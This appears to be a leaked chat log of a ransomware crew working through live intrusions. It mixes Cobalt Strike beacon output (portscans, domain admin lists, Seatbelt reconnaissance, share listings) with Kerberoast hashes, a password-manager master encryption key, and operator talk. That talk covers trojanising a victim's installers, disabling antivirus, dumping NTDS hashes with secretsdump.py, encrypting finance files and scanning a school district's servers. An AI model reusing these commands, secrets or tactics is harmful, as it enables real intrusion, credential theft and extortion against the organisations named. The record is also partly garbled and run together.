                         5779C06426790A5C7998E94E44341A18CE6D5C4287C93C82286DF1AF180DF16543567A3E9D8A8679
                         E5B16BCCD1136074AFD36F9FBA1D8913C50C00718F9B48730670713A50D4590B4FBB8932483A2AE6
                         B80BA376DAECB3B8C0C896E6F402E95E6EAE1B5D1B125559904D8B9B295E1F9DEE020493AA73E62C
                         22953B86DDC1F71447449C9924192EFA419025D07EA8D8C876FBFC0E697BED24440CEBE3D943AF8B
                         F3A5419F139B893CE4A8B4E81EB63BA13DB0B1FB22020BACD3B77E4165E0B0AC2F1109606F976F3F
                         C5A62E1704F09522C1683D69278B4E4978E1717EEC5E10F72A17A00B77BE6A2493B3F889AB8EFAF6
                         B0F5D73B0999D72F5FACBEED69AF9CCF0F4953104987E7A6ABB8004A640F8


[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt where is the info below? noThis is full[ ](https://mediaeveryone.com/group/zohocorpin-com?msg=yatwv5agaaG3kamLj) full hash here please`c.pwd
```
encryption: CRYPT_32
isAutoGenerated: true
value: !binary AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAQJ/RBxj+LUaKlYDoaxymTQAAAAAWAAAATQBhAHMAdABlAHIAIABLAGUAeQAAAANmAADAAAAAEAAAAGVElARuRUadgjS3W1uSvCQAAAAABIAAAKAAAAAQAAAAUy6lhSSz1zlSx9DSYFh9yMgCAABqQA0+VQbKZkfm57FEHb86h1+nYjPkHiN7pUKp/8UYSgHvAOu41zWNCfbJ1ek+agdInGj95BdYXt14ETUawhtMuRlEq6ovhefsudhtI75/ZA8xUuUYsffwt4kAJOJAACyNFyVDMywtMc6xLFUlrfGvhrZVqPtWgeGyolUxukQbbF/Va4wYE3p+fsGHwNGoQdjMDFi/w1NMxZRVdF3tPtnvUHTkcJep8iFoBN8cLC2li0iDkg7yv6reWc4U63M9ZD3nz5Q6WlrFHOiII1m4LtThNFTGGvA+afWiGAYOEvtIjsBOSYJn670716/3Yodo8jLjftWW3+FuakUdHvjZylfKqBSIkxgRWqcAiHhzjVjpeYvrMpnb+LiioMa6axKrS1pE+/6fQrWpJzyVb/eLIXwu9FBTjCbW1kiWnpVACqdWUBCqL9hdfUL2X72gJsaWtgag/vKLSWjrS8VatdaXNBDqaFeFibYmbMwqHT1u3uxEL9fg+SjFA5SHjiyo3MMAxENByEwSoXw+sw/6YU9vM1Uwm9AN8e/Mc4XGe7fhc0A+18MolWgEbI1dCDTLutObgls7L9GEqo19XMfCMBWfcKVBjU51zpG6PolDbIvNsNF0lFKXbN0oey1wFhDnmk3mCE6qJ+AZ0qYFXwZitBFsEmPNul4+BoDKfrvuofwoLYfi+KxHTgo4XzXFFW9LNdo+gt62Ngsyl9WI9gqvxy+CavMn9M8my9r6nliaWVEtRxOS4pfabPc80vzncdVPYAxVeMGkw2OJOaeCw41VWBKl7TSIE5JQAogB1Sdl1+Z+GoTif6gkXf5e6ZBvnJEMoBhADcTWDm/Genp/FeuV
``[ ](https://mediaeveryone.com/group/zohocorpin-com?msg=7QWLSvMpoZJ3ApgQf) UserName=admin
OrgAgentKey=7ibHlt21yiwithin this there is an av that is fighting against such methodspon fact need to pull the file, glue it to the load and load it back Sure, but it is not very simple and quite strange@tl1 can we somehow take from his desktop file msi or exe add to it our load and force him to run? It's just that he has installers on his desktop and the same anydesk, which he probably runs without installing...`pmp_key.key
```
#This file contains the master AES encryption key for this installation, automatically generated by Password Manager Pro.
#The default location of this file is <PMP_HOME>conf and it is not secure to leave this file here, unless
#the server is sufficiently hardened to protect any illegal access of this file.
#It is highly recommended to move this file out of its default location and for instructions to securely store this file refer.
#OLDENCRYPTIONKEY=9COBmS4sjljyY8ii1pn9Z2g+CkNUf+qTwR4LvQkVYFA=
#Tue Dec 10 20:22:53 IST 2019
ENCRYPTIONKEY=5qRvsVKpPFdB6RnZQI89p6PUYWT6Oki1gHGgZWgRID0=
```
`OLDENCRYPTIONKEY=9COBmS4sjljjyY8ii1pn9Z2g+CkNUf+qTwR4LvQkVYFA=`
``ENCRYPTIONKEY=5qRvsVKpFdB6RnZI89p6PUYWT6Oki1gHGgZWgRID0\=``ShareFinder
```
\trm-compliance.csez.zohocorpin.com\DC_Deployment -
\trm-compliance.csez.zohocorpin.com\F -
\trm-compliance.csez.zohocorpin.com\Venu-5860 -

\DC-SOFTWARE.csez.zohocorpin.com\iso -
\DC-SOFTWARE.csez.zohocorpin.com\print$ - Printer Drivers
\\DC-SOFTWARE.csez.zohocorpin.com\u16 -
\DC-SOFTWARE.csez.zohocorpin.com\Users -

\print-server-bkp.csez.zohocorpin.com\Coolpay-Server$ -
\print-server-bkp.csez.zohocorpin.com\D -
\print-server-bkp.csez.zohocorpin.com\print$ - Printer Drivers
\print-server-bkp.csez.zohocorpin.com\Users -

\est-desktopcentral.csez.zohocorpin.com\DC Backups -
\est-desktopcentral.csez.zohocorpin.com\DC_share -
\est-desktopcentral.csez.zohocorpin.com\logs -
\est-desktopcentral.csez.zohocorpin.com\pg_log -
\est-desktopcentral.csez.zohocorpin.com\ScheduledDBBackup -
\est-desktopcentral.csez.zohocorpin.com\webapps -

\EST-ADC2.csez.zohocorpin.com/NETLOGON - Logon server share
\EST-ADC2.csez.zohocorpin.com\SYSVOL - Logon server share

```
Also looking forcsez.zohocorpin.comip DC
`192.168.100.61````
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com
Hash : $krb5tgs$18$$*$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com*$AD257AAE06
                         D3290ED5802E98A5680072$074EFBF3ED77AAD8403FFD9B1DC91C3A4548ABC68CC6D82693883D1F2
                         674826398708B33E7474B1A7A88CDBB147CEE0E9E55DF333D38AF6E6BF1FFCC9B9848E96372B2684
                         F5D616B986D16C673820FEF3EDFE905FC2EC48B0BE46A4AC3229930167A88F92124F509C9FE99EE6
                         074CA3F7443F08AB4F49CE97F02D83CE21E7958541219280C06EC0259FFEE7DD9BDA9FCC28C69984
                         884576F8A098B0507E45E2EA3A6FBACB1CEFF7F435484F83B050C3D9B2DC68E5983963629CE1C04D
                         72CF0EFA00AA01FC0BDDADDDFDCC3A9F0532EFEC4D88408B597AC74F2668E979E22348E0C6F1890B
                         1AE0F8D2724492417699C3BD444312212A5FF50A246D4D5770AD50860E3B52CCD2BCE7A6660DA9B6
                         FFE81B456129A617FBF351F815FE23624699E69EFB4F4788531E5677B125136BCF1AD9DCC3C8C139
                         B36C05C5A493BE7237E14D4F194307F1B7D53F2CA333364CAC135D79688E4A0EBB342BC3DA9C3D12
                         7255740A8843B17CAB787077BDDFEF59A916E56392DB087BE09523933671E3832D532D329B2BFCF4
                         ECDB2A51274DD50970EC9796AB56788FA7CE668093FC5D68EE6AB796574985BD1CFDAF6EE88416E9
                         5F33A3F7C29E4ED1C8804DEA928E2050A2070044A83AF610D673EAF783D3C258BF4F00F3A67EE236
                         4A19579A448CEA1806C716B3603C0C6DA9B72BFAB8390CD7971CD4FBE8F022E64828069C478D56CA
                         DE866536D19FFB5EF529F408CBC7D9F6B161164632CEE450220CA94B1CD692D9A6C4EACA431AAAD9
                         024F429182D8D0B4BAFE8C9B27BE54444DBFB4D7FE2F3949064F9CBC3034F59EF0AD9C01D0238F53
                         6614F21303664809AECFE53914D4E16B9222BD0550F8587F39AFA385E87EA7B430994234E883FB46
                         150E6BFF285F69F035C0410C11E4610C187EA4A05E57E3FEE8C1CB133DAE9549E9B9E757E0BB9A1E
                         5016A8893C2EDECD58D61216879A358AFAE0799986B31CA903B655E244C19ADBF68DB8A8417F5989
                         976B4B19CA800E5BF1E8B7227A559E146A7B63360E430B31823801CAA81E625481858F598BB10FF9
                         E31F97473E408B67297A919C3C4264ABA52F8242F4F8E07D4946AE7B146A69950C54923A895D333E
                         027820953AC4FBED2201253B15B79AC993628CADDA92AA14232A6F0974A19983099890F2119E7D64
                         C5AA329A5CE288E7CB3F66AB76619330E27380E145E089DD71799B7B511FBF9A843F8DF6973EBBAC
                         5779C06426790A5C7998E94E44341A18CE6D5C4287C93C82286DF1AF180DF16543567A3E9D8A8679
                         E5B16BCCD1136074AFD36F9FBA1D8913C50C00718F9B48730670713A50D4590B4FBB8932483A2AE6
                         B80BA376DAECB3B8C0C896E6F402E95E6EAE1B5D1B125559904D8B9B295E1F9DEE020493AA73E62C
                         22953B86DDC1F71447449C9924192EFA419025D07EA8D8C876FBFC0E697BED24440CEBE3D943AF8B
                         F3A5419F139B893CE4A8B4E81EB63BA13DB0B1FB22020BACD3B77E4165E0B0AC2F1109606F976F3F
                         C5A62E1704F09522C1683D69278B4E4978E1717EEC5E10F72A17A00B77BE6A2493B3F889AB8EFAF6
                         B0F5D73B0999D72F5FACBEED69AF9CCF0F4953104987E7A6ABB8004A640F8


````beacon> portscan 10.59.8.0/24 23,22,80,1433,135,445,3389,5900`
```
10.59.8.233:80
10.59.8.223:80
10.59.8.221:80
10.59.8.217:80
10.59.8.213:80
10.59.8.210:80
10.59.8.201:80
10.59.8.204:80
10.59.8.99:80
10.59.8.193:80
10.59.8.188:80
10.59.8.180:80
10.59.8.175:80
10.59.8.167:80
10.59.8.165:80
10.59.8.164:80
10.59.8.160:80
10.59.8.117:80
10.59.8.133:80
10.59.8.132:80
10.59.8.122:80
10.59.8.120:80
10.59.8.103:80
10.59.8.243:80
10.59.8.232:80
10.59.8.147:80
10.59.8.106:80
10.59.8.55:80
10.59.8.112:80
10.59.8.107:80
10.59.8.104:80
10.59.8.98:80
10.59.8.102:80
10.59.8.97:80
10.59.8.88:80
10.59.8.86:80
10.59.8.85:80
10.59.8.84:80
10.59.8.81:80
10.59.8.67:80
10.59.8.61:80
10.59.8.53:80
10.59.8.49:80
10.59.8.41:80
10.59.8.48:80
10.59.8.40:80
10.59.8.34:80
10.59.8.5:80
10.59.8.28:80
10.59.8.19:80
10.59.8.12:80
10.59.8.9:80
```
``Scanner module is complete````
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator adssp assetprober
desktopcentral gjprabu-0985 kamal-0150
nocfw sysadmin sysaudit
vijay-3486 zohoits
The command completed successfully.

``10.59.9.180 ping more``beacon> portscan 192.168.237.0/24 23,22,80,1433,135,445,3389,5900
```
192.168.237.248:3389
192.168.237.248:1433
192.168.237.248:135
192.168.237.248:80
192.168.237.239:5900
192.168.237.231:80
192.168.237.231:23
192.168.237.216:3389
192.168.237.203:80
192.168.237.196:80
192.168.237.196:23
192.168.237.187:3389
192.168.237.187:135
192.168.237.187:80
192.168.237.248:22 (SSH-2.0-WeOnlyDo-wodFTPD 3.3.0.424)
192.168.237.231:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
192.168.237.216:22 (SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3)
192.168.237.203:22 (SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13)
192.168.237.196:22 (SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.6)
192.168.237.179:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
192.168.237.203:23
192.168.237.239:22 (SSH-2.0-OpenSSH_7.6)
192.168.237.187:22 (SSH-2.0-6.4.18.407 SSH Tectia Server)
192.168.237.179:445 (platform: 500 version: 6.1 name: ZLABS-VR-1 domain: WORKGROUP)
192.168.237.187:445
192.168.237.239:445
192.168.237.248:445
```
``Scanner module is complete````
 [*] OS Build Number: 18363
 [*] Enumerating installed KBs...

 4576484
 4517245
 4560959
 4561600
 4565554
 4569073
 4576751
 4576754
 4574727

 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk

 [*] Finished. Found 2 potential vulnerabilities.

``portscan 172.24.148.0/24-OS undefined?
```
172.21.182.237:5985
172.21.182.237:636
172.21.182.237:593
172.21.182.237:464
172.21.182.237:389
172.21.182.238:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
172.21.182.237:5985
172.21.182.237:636
172.21.182.237:593
172.21.182.237:464
172.21.182.237:389
172.21.182.238:22 (SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8)
172.21.182.237:139
172.21.182.237:135
172.21.182.237:88
172.21.182.237:53
172.21.182.227:5985
172.21.182.227:3389
172.21.182.227:636
172.21.182.227:593
172.21.182.227:464
172.21.182.227:389
172.21.182.227:139
172.21.182.227:135
172.21.182.227:88
172.21.182.227:80
172.21.182.227:53
172.21.182.108:3389
172.21.182.108:139
172.21.182.108:135
172.21.182.108:23
172.21.182.109:3389
172.21.182.109:139
172.21.182.109:135
172.21.182.63:5900
172.21.182.63:3389
172.21.182.63:139
172.21.182.63:135
172.21.182.60:3389
172.21.182.45:5985
172.21.182.45:3389
172.21.182.45:389
172.21.182.45:139
172.21.182.45:135
172.21.182.45:88
172.21.182.45:53
172.21.182.45:636
172.21.182.45:22 (SSH-2.0-OpenSSH_for_Windows_8.1)
172.21.182.8:600
172.21.182.8:443
172.21.182.8:135
172.21.182.8:80
172.21.182.8:22 (SSH-2.0-OpenSSH_4.3)
172.21.182.32:23
172.21.182.32:22 (SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3)
172.21.182.27:5900
172.21.182.27:88
172.21.182.27:22 (SSH-2.0-OpenSSH_7.9)
172.21.182.27:445
172.21.182.8:445
172.21.182.63:445
172.21.182.108:445
172.21.182.227:445
172.21.182.237:445
```
``Scanner module is complete`` took one by one not in parallel all 5 in /24 then in portscan /24 these sabnets and wrote without it without complete domain?
Pinging PMP-2K8R2-DC1.csez.zohocorpin.com [172.21.182.45] with 32 bytes of data:
Reply from 172.21.182.45: bytes=32 time=13ms TTL=126
Reply from 172.21.182.45: bytes=32 time=12ms TTL=126
Reply from 172.21.182.45: bytes=32 time=11ms TTL=126
Reply from 172.21.182.45: bytes=32 time=7ms TTL=126

Ping statistics for 172.21.182.45:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 13ms, Average = 10ms

```
```
Pinging pmp-w7-jap.csez.zohocorpin.com [172.24.148.190] with 32 bytes of data:
Reply from 172.24.148.190: bytes=32 time=26ms TTL=126
Reply from 172.24.148.190: bytes=32 time=9ms TTL=126
Reply from 172.24.148.190: bytes=32 time=8ms TTL=126
Reply from 172.24.148.190: bytes=32 time=7ms TTL=126

Ping statistics for 172.24.148.190:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 26ms, Average = 12ms

```
```
Pinging pmp-win10-64-2.csez.zohocorpin.com [192.168.237.248] with 32 bytes of data:
Reply from 192.168.237.248: bytes=32 time=12ms TTL=126
Reply from 192.168.237.248: bytes=32 time=8ms TTL=126
Reply from 192.168.237.248: bytes=32 time=8ms TTL=126
Reply from 192.168.237.248: bytes=32 time=8ms TTL=126

Ping statistics for 192.168.237.248:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 8ms, Maximum = 12ms, Average = 9ms

```
```
Pinging pmp2k16.csez.zohocorpin.com [172.24.147.218] with 32 bytes of data:
Reply from 172.24.147.218: bytes=32 time=23ms TTL=126
Reply from 172.24.147.218: bytes=32 time=9ms TTL=126
Reply from 172.24.147.218: bytes=32 time=9ms TTL=126
Reply from 172.24.147.218: bytes=32 time=9ms TTL=126

Ping statistics for 172.24.147.218:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 9ms, Maximum = 23ms, Average = 12ms

```
```
Pinging ramanathan-0501.csez.zohocorpin.com [10.59.8.42] with 32 bytes of data:
Reply from 10.59.8.42: bytes=32 time=48ms TTL=63
Reply from 10.59.8.42: bytes=32 time=72ms TTL=63
Reply from 10.59.8.42: bytes=32 time=56ms TTL=63
Reply from 10.59.8.42: bytes=32 time=63ms TTL=63

Ping statistics for 10.59.8.42:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 48ms, Maximum = 72ms, Average = 59ms

``````
[+] host called home, sent: 409 bytes
[+] received output:
Server: UnKnown
Address: 192.168.100.30

_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = tsi-csez-adc.csez.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = ruestadc.ru.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = win2k12master.csez.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = est-adc.csez.zohocorpin.com
_ldap._tcp.csez.zohocorpin.com SRV service location:
	  priority = 0
	  weight = 100
	  port = 389
	  svr hostname = est-adc2.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-master-server.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-dns-slave4.csez.zohocorpin.com
csez.zohocorpin.com nameserver = proxy-server2.csez.zohocorpin.com
csez.zohocorpin.com nameserver = proxy-server1.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-dns-slave3.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-dns-slave1.csez.zohocorpin.com
csez.zohocorpin.com nameserver = est-dns-slave2.csez.zohocorpin.com
'nltest' is not recognized as an internal or external command,
operable program or batch file.

``Ping them too``.
  pmp-2k8r2-dc1 pmp\administrator
  pmp-w7-jap pmp\administrator
  pmp-win10-64-2 pmp\administrator
  pmp2k16 administrator
  ramanathan-0501 ZOHOCORP\ramanathan-0501
``````
====== RDPSavedConnections ======

Saved RDP Connection Information (S-1-5-21-1867688552-3649366528-3325780993-65238)

  RemoteHost UsernameHint
  ---------- ------------
  pmp-2k8r2-dc1 pmp\administrator
  pmp-w7-jap pmp\administrator
  pmp-win10-64-2 pmp\administrator
  pmp2k16 administrator
  ramanathan-0501 ZOHOCORP\ramanathan-0501

====== RDPSessions ======

  SessionID : 0
  SessionName : Services
  UserName :
  DomainName :
  State : Disconnected
  SourceIp :

  SessionID : 1
  SessionName : Console
  UserName : raja-9298
  DomainName : ZOHOCORP
  State : Active
  SourceIp :
```
```
====== LogonSessions ======

Logon Sessions (via WMI)


  UserName : raja-9298
  Domain : ZOHOCORP
  LogonId : 34354149
  LogonType : Interactive
  AuthenticationPackage : Kerberos
  StartTime : 13-09-2020 10:40:04
  UserPrincipalName :

  UserName : raja-9298
  Domain : ZOHOCORP
  LogonId : 34354119
  LogonType : Interactive
  AuthenticationPackage : Kerberos
  StartTime : 13-09-2020 10:40:04
  UserPrincipalName :
====== LSASettings ======

  auditbasedirectories : 0
  auditbaseobjects : 0
  Bounds : 00-30-00-00-00-20-00-00
  crashonauditfail : 0
  fullprivilegeauditing : 00
  LimitBlankPasswordUse : 1
  NoLmHash : 1
  Security Packages : ""
  Notification Packages : scecli
  Authentication Packages : msv1_0
  disabledomaincreds : 0
  everyoneincludesanonymous : 0
  forceguest : 0
  LsaCfgFlagsDefault : 0
  LsaPid : 908
  ProductType : 6
  restrictanonymous : 1
  restrictanonymoussam : 1
  scenoapplylegacyauditpolicy : 1
  SecureBoot : 1
  usemachineid : 0
```
```
====== LocalUsers ======

  ComputerName : localhost
  UserName : Administrator
  Enabled : False
  Rid : 500
  UserType : Administrator
  Comment : Built-in account for administering the computer/domain
  PwdLastSet : 01-01-1970 00:00:00
  LastLogon : 28-05-2019 23:10:40
  NumLogins : 5

  ComputerName : localhost
  UserName : DefaultAccount
  Enabled : False
  Rid : 503
  UserType : Guest
  Comment : A user account managed by the system.
  PwdLastSet : 01-01-1970 00:00:00
  LastLogon : 01-01-1970 00:00:00
  NumLogins : 0

  ComputerName : localhost
  UserName : Guest
  Enabled : False
  Rid : 501
  UserType : Guest
  Comment : Built-in account for guest access to the computer/domain
  PwdLastSet : 01-01-1970 00:00:00
  LastLogon : 01-01-1970 00:00:00
  NumLogins : 0

  ComputerName : localhost
  UserName : sysadmin
  Enabled : True
  Rid : 1001
  UserType : Administrator
  Comment :
  PwdLastSet : 19-06-2019 14:28:18
  LastLogon : 15-08-2019 08:31:17
  NumLogins : 31

  ComputerName : localhost
  UserName : WDAGUtilityAccount
  Enabled : False
  Rid : 504
  UserType : Guest
  Comment : A user account managed and used by the system for Windows Defender Application Guard scenarios.
  PwdLastSet : 28-05-2019 22:52:09
  LastLogon : 01-01-1970 00:00:00
  NumLogins : 0.
``ping CSEZ.ZOHOCORPIN.COM.
beacon> execute-assembly /home/user/tools/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Processing files in \CSEZ.ZOHOCORPIN.COM\sysvol\CSEZ.ZOHOCORPIN.COM\policies\

[+] received output:
[-] Invoke_3 on EntryPoint failed.

``````
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
beacon> shell net group "enterprise admins" /dom
[*] Tasked beacon to run: net group "enterprise admins" /dom
[+] host called home, sent: 162 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

System error 5 has occurred.

Access is denied.


[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

System error 5 has occurred.

Access is denied.

``Access is dead tried the shell net group "domain admins"/dom maybe also the VPN is not connected/``
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x52 (82) - Local Error
Terminating program.
``````
====== AntiVirus ======
Windows Defender
Kaspersky Endpoint Security for Windows
```
```
====== DotNet ======
  Installed CLR Versions
      4.0.30319
  Installed .NET Versions
      4.8.03752
  Anti-Malware Scan Interface (AMSI)
      OS supports AMSI : True
     .NET version supports AMSI : True
        [!] The highest .NET version is enrolled in AMSI!
```
```
====== NetworkShares ======

  Name : ADMIN$
  Path : C:\WINDOWS
  Description : Remote Admin

  Name : C$
  Path : C:\
  Description : Default share

  Name : D$
  Path : D:\
  Description : Default share

  Name : E$
  Path : E:\
  Description : Default share

  Name : IPC$
  Path :
  Description : Remote IPC

```
```
====== OSInfo ======

  Hostname : raja-9298
  Domain Name : csez.zohocorpin.com
  Username : ZOHOCORP\raja-9298
  ProductName : Windows 10 Pro
  EditionID : Professional
  ReleaseId : 1909
  Build : 18363.1082
  BuildBranch : 19h1_release
  CurrentMajorVersionNumber : 10
  CurrentVersion : 6.3
  Architecture : AMD64
  ProcessorCount : 12
  IsVirtualMachine : False
  BootTimeUtc (approx) : 12-09-2020 18:15:41 (Total uptime : 08:15:23:11)
  HighIntegrity : False
  IsLocalAdmin : True
    [*] In medium integrity but user is a local administrator - UAC can be bypassed.
  CurrentTimeUtc : 21-09-2020 09:38:52 (Local time: 21-09-2020 15:08:52)
  TimeZone : India Standard Time
  TimeZoneOffset : 05:30:00
  InputLanguage : English (India)
  InstalledInputLanguages : English (India), Unknown layout
  MachineGuid : e2c815c9-b79d-4a27-bc08-6c917f3ab98d
```
```
====== InstalledProducts ======
Adobe Flash Player 10 Plugin
10.2.153.1

Adobe Shockwave Player 12.1
12.1.3.153

CVSNT
2.0.51

WinCvs 2.0

Google Chrome
85.0.4183.102

Microsoft Edge
85.0.564.51

Microsoft Edge Update
1.3.135.29

TeamViewer
15.3.8497

TotalCSVConverter

Intel(R) Wireless Bluetooth(R)
20.60.1

DcuMSMWrap
5.0.03

Microsoft Visual C++ 2013 Redistributable (x64)
12.0.30501.0

Realtek USB Audio
6.3.9600.2202

Python 3.7.3 Tcl/Tk Support (32-bit)
3.7.3150.0

DFUDriverSetupX64Setup
6.6.1939.0

Python 3.7.3 Documentation (32-bit)
3.7.3150.0

Thunderbolt™ Software
17.4.79.510

Python 3.7.3 Core Interpreter (32-bit)
3.7.3150.0

Skype for Business Web App Plug-in
15.8.20020.400

Microsoft VC++ redistributables repacked.
12.0.0.0

Java Auto Updater
2.8.71.15

MySQL Installer - Community
1.4.29.0

Python 3.7.3 Development Libraries (32-bit)
3.7.3150.0

Intel(R) Chipset Device Software
10.1.17541.8066

ManageEngine Analytics Plus
1.0

Google Update Helper
1.3.35.451

swMSM
12.0.0.1

ManageEngine
10.0.518.W

ZVoice - Desktop 1.1.9

Mozilla Firefox 79.0 (x64 en-US)

PuTTY release 0.74 (64-bit)

Mercurial 3.8.1 (x64)

FortiClient VPN
6.2.0.0780

LibreOffice 6.2.4.2
6.2.4.2

MySQL Server 5.7
5.7.26
``SeatBelt all``.

beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
sysadmin
ZOHOCORP\raja-9298
The command completed successfully.

``````
beacon> shell nslookup
[*] Tasked beacon to run: nslookup
[+] host called home, sent: 39 bytes
[+] received output:
Default Server: UnKnown
Address: 192.168.100.30


```
Domain : csez.zohocorpin.com ``You got the session? user4til tomorrow.1.done.gaudyme.comTill tomorrow by 7.00, the rest of the sessions are in the slipstream then```.
servers:
in hell: 2
actual: 1
alive: 1
pulled: 5

armas:
per hell: 30
alive: 5
drawn: 5

encrypted: everything
``and that's it, then the status for the tick and in the other folders then we'll leave it to the dk2 sessions left to be pinged``
beacon> shell ping 172.16.1.247 -n 1
[*] Tasked beacon to run: ping 172.16.1.247 -n 1
[+] host called home, sent: 53 bytes
[+] received output:

Pinging 172.16.1.247 with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.

Ping statistics for 172.16.1.247:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

beacon> shell ping 172.16.1.83 -n 1
[*] Tasked beacon to run: ping 172.16.1.83 -n 1
[+] host called home, sent: 52 bytes
[+] received output:

Pinging 172.16.1.83 with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.

Ping statistics for 172.16.1.83:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

beacon> shell ping 172.16.1.61 -n 1
[*] Tasked beacon to run: ping 172.16.1.61 -n 1
[+] host called home, sent: 52 bytes
[+] received output:

Pinging 172.16.1.61 with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.

Ping statistics for 172.16.1.61:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Finance, accounting, corporate files are encrypted Disconnect the other avs and that's all it worked Check the folders)) have deleted How did you disconnect then? on the dk yes
but there's no control console.
it looks like it's in the cloud) shut down the avs? spread on the dk readme.txt finished with the servers sorting serversoksort servers and so on the old scheme all the same hash krbrst userno just in case throw here hash not the fact that there all passwords So if there are passwords, what's the point of hashes?in cleartext as it is clear cleartext passwords)there all hashes.ptsdlt.ptsdlt not ready work)ready work in forms? type echo 1 > 1.htmlcreate there a file 1.htm with the text 1happens to the truth there is no iisstart.htmsearch there index fileadaThis path on the disk you mean? i mean in intpub is wwwroot?there is a wwwroot there will be a folder inetpub or something like that check the C:\direct in forms or ftp in C:\Windows\system32\inetsrv\Config` no configs what about configs and so on let's deal with forms.decoder ntsy you run the extract
secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local
Put all files in one folder, there will be 4 of them together with the script.
pip
pip install impacket
pip install pycrypto
pip install pyasn1
apt-get install python-dev
``no config on the ftp in ``C:\Windows\system32\inetsrv\Confighow much archive did you get? it's too bighow to upload here `sendspace.com` click here and password me first into the archive under the password and upload here it is downloaded. and where do you want to upload it?where is the physical path on the disk look at the configs and on both winndef, as i understand on the fpt simantecki other check the processesedrforms.sisd.net pulled in the same way as the external one. check these 3
mail.sisd.net 40.101.49.66 Sign in to Outlook
autodiscover.sisd.net 52.97.133.216 Sign in to Outlook
forms.sisd.net 216.171.94.67 Windows Microsoft-IIS 10.0 ASP.NET IIS Windows Server
``mail.sisd.net only external ftp yes, I get it. we will put them zakrepy? and communication with the internal server as you can see they have ftp. subdomains that have external ipey sent you a scan of subdomains from their external main domain> what to scan? or again I do not understand? sub domains[ ](https://mediaeveryone.com/group/sisd-net?msg=z9QaJhhCjDGhxPEBL) then do not understand, what does scan sub domains?the dlls are not knocked out now let's play with this and do another option zakrepaetsya and we are interested nunu external What does it mean white ips?) check edtax on these dns with the main yes[ ](https://mediaeveryone.com/group/sisd-net?msg=SJRstQrsdQgGv5wNi) subs only these? yes. is there a session available for manipulation?[ ](https://mediaeveryone.com/group/sisd-net?msg=3uPeboh7iKzkkJTER) local 10.0.51.253sub>> scan the subs
www.sisd.net 13.35.193.39 Windows Microsoft-IIS 8.5 ASP.NET 4.0.30319 Socorro Independent School District / Homepage
mail.sisd.net 40.101.49.66 Sign in to Outlook
autodiscover.sisd.net 52.97.133.216 Sign in to Outlook
sip.sisd.net 52.112.193.13 RTC 7.0
my.sisd.net 216.171.94.39 Apache PHP my.sisd.net Log-in
portal.sisd.net 216.171.94.44
forms.sisd.net 216.171.94.67 Windows Microsoft-IIS 10.0 ASP.NET IIS Windows Server
survey.sisd.net 216.171.94.93
